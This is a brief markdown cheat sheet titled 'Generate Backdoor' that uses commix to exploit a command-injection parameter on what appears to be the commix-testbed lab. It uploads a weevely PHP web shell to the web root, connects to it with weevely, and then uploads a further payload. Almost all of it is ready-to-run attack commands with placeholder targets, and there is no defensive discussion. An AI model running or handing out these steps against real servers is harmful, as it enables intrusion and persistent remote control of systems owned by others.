# Generate Backdoor

* $ python2 commix.py --url="http://<targetip>:3000/commix-testbed/scenarios/regular/GET/classic.php?addr=INJECT_HERE" --file-upload="/home/<user>/<path>/weevely.php" --file-dest="/var/www/example.com/public_html/commix-testbed/scenarios/regular/GET/"

* $ weevely http://<targt ip>:3000/commix-testbed/scenarios/regular/GET/weevely.php commix

## Upload Your Payload

* $ file_upload <path to payload> <file name you want for server>
